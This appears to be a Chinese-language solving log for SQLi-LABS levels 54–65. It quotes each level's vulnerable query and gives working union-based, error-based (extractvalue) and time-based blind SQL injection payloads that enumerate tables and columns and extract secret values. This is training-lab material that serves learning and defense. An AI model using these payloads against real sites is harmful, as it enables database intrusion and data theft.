SQLi-LABS靶場Less-54~65解題記錄
刷題
Page4
Less-54(GET - challenge - Union- 10 queries allowed - Variation 1)
GET - challenge - union - 允許10次查詢 - 變種1
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
這一關依舊是字元型注入,但是隻能嘗試十次。
這裡的表名和密碼等是每十次嘗試後就強制進行更換。
因為已經知道了資料庫名字叫做 challenges,所以我們需要知道表名。
暴庫:
?id=-1' union select 1,2,database() --+
challenges
爆表:
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
8aklv5t3d6
暴列:
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='8aklv5t3d6' --+
猜測secret_2YSJ是key
暴值:
?id=-1' union select 1,2,group_concat(secret_2YSJ) from challenges.8aklv5t3d6 --+
Less-55(GET - challenge - Union- 1 4 queries allowed - Variation 2)
GET - challenge - union - 允許14次查詢 - 變種2
$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";
思路同上54 ,只不過多一個括號?id=0) 次數為14次
爆表:
?id=-1) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
gbk3yw2slw
暴列:
?id=-1) union select 1,2,group_concat(column_name) from information_schema.columns where table_name='gbk3yw2slw' --+
secret_ECLS
暴值:
?id=-1) union select 1,2,group_concat(secret_ECLS) from gbk3yw2slw --+
Less-56(GET - challenge - Union- 1 4 queries allowed - variation 3)
GET - challenge - union - 允許14次查詢 - 變種3
$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";
思路同上54,55。只不過多一個單引號和括號?id=0’) 次數為14次
爆表:
?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
gbk3yw2slw
暴列:
?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='gbk3yw2slw' --+
secret_ECLS
暴值:
?id=-1') union select 1,2,group_concat(secret_ECLS) from gbk3yw2slw --+
Less-57(GET - challenge - Union- 14 queries allowed - Variation 4)
GET - challenge - union - 允許14次查詢 - 變種4
$id= '"'.$id.'"';
// Querry DB to get the correct output
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
思路同上,只不過 id=”.$id.” 這裡進行了雙引號閉合
爆表:
?id=-1" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
暴列:
?id=-1" union select 1,2,group_concat(column_name) from information_schema.columns where table_name='gbk3yw2slw' --+
暴值:
?id=-1" union select 1,2,group_concat(secret_ECLS) from gbk3yw2slw --+
Less-58(GET - challenge - Double Query- 5 queries allowed - Variation l)
GET - challenge - 雙注入 - 允許5次查詢 - 變種1
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
執行sql 語句後,並沒有返回資料庫當中的資料,所以我們這裡不能使用 union 聯合注入,這裡使用報錯注入。
爆表:
?id=-1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+
na84sqpzf1
暴列:
?id=-1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='na84sqpzf1'))) --+
secret_H21F
暴值:
?id=-1' and extractvalue(1,concat(0x7e,(select group_concat(secret_H21F) from na84sqpzf1))) --+
yCeBdWLEcQBb9swXSgwxGsKf
Less-59(GET - challenge - Double Query- 5 queries allowed - Variation 2)
GET - challenge - 雙注入 - 允許5次查詢 - 變種2
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
同58,只不過沒有單引號
爆表:
?id=-1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+
ir2kngnqlg
暴列:
?id=-1 and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='ir2kngnqlg'))) --+
secret_VFU4
暴值:
?id=-1 and extractvalue(1,concat(0x7e,(select group_concat(secret_VFU4) from ir2kngnqlg))) --+
FgW73MnkRN6zQFoMJF8lB2hx
Less-60(GET - challenge - Double Query- 5 queries allowed - Variation 3)
GET - challenge - 雙注入 - 允許5次查詢 - 變種3
$id = '("'.$id.'")';
// Querry DB to get the correct output
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
同59,只不過多了雙引號和括號?id=-1")
爆表:
?id=-1") and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+
qwo4md2ykm
暴列:
?id=-1") and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='qwo4md2ykm'))) --+
secret_PIER
暴值:
?id=-1") and extractvalue(1,concat(0x7e,(select group_concat(secret_PIER) from qwo4md2ykm))) --+
5dbmmA4u4BmYhuqSnUvW7VzR
Less-61(GET - challenge - Double Query- 5 queries allowed - Variation 4)
GET - challenge - 雙注入 - 允許5次查詢 - 變種4
$sql="SELECT * FROM security.users WHERE id=(('$id')) LIMIT 0,1";
同上,只不過多了兩個括號和一個雙引號?id=-1'))
爆表:
?id=-1')) and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+
aakl60y1i1
暴列:
?id=-1')) and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='aakl60y1i1'))) --+
secret_VHWW
暴值:
?id=-1')) and extractvalue(1,concat(0x7e,(select group_concat(secret_VHWW) from aakl60y1i1))) --+
bGSX0wP4UeitlxG5b6BRtzMe
Less-62(GET - challenge - Blind - 130 queries allowed - variation 1)
GET - challenge - 盲注 - 允許130次查詢 - 變種1
$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";
此處union和報錯注入都已經失效了,那我們就要使用延時注入了。
?id=1’)and If(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=‘challenges’),1,1))=79,0,sleep(10))–+
當正確的時候時間很短,當錯誤的時候時間大於 10 秒,此時可以利用指令碼進行嘗試。
首先要知道該資料庫下有幾張表。
通過
?id=1') and if((select count(*) from information_schema.tables where table_schema=database())=1,sleep(5),1) --+
可以判斷出,chllanges表下面只有一張表。
判斷表名長度,表名
?id=1') and if(length((select table_name from information_schema.tables where table_schema=database()))=10,sleep(5),1) --+
判斷出表名的長度為10。
?id=1') and if(ascii(substr((select table_name from information_schema.tables where table_schema=database()),1,1))=54,sleep(5),1) --+
通過此語句判斷出來,表名的第一個字母的ascii碼為54,對應的字元為6.
判斷列
select count(*) from information_schema.tables where table_schema=database() and table_name="69qpriqcgb"
同理,利用以上語句判斷出69qpriqcgb表中(此表明是隨機生成的),有4個欄位。
select column_name from information_schema.columns where table_schema=database() and table_name="69qpriqcgb" limit 0,1
Less-63(GET - challenge - Blind - 130 queries allowed - variation 2)
GET - challenge - 盲注 - 允許130次查詢 - 變種2
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
同上62,只不過是單引號
payload:?id=0%27and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=77,0,sleep(10))–+
正確時間短,錯誤時間長
Less-64(GET - challenge - Blind - 130 queries allowed - variation 3)
GET - challenge - 盲注 - 允許130次查詢 - 變種3
$sql="SELECT * FROM security.users WHERE id=(($id)) LIMIT 0,1";
同上63,只不過是雙括號
payload:?id=0))and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=77,0,sleep(10))–+
正確時間短,錯誤時間長
Less-65(GET - challenge - Blind - 130 queries allowed - variation 4)
GET - challenge - 盲注 - 允許130次查詢 - 變種4
$id = '"'.$id.'"';
// Querry DB to get the correct output
$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";
同上,只不過?id=1”)
payload:?id=1%22)and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=79,0,sleep(10))–+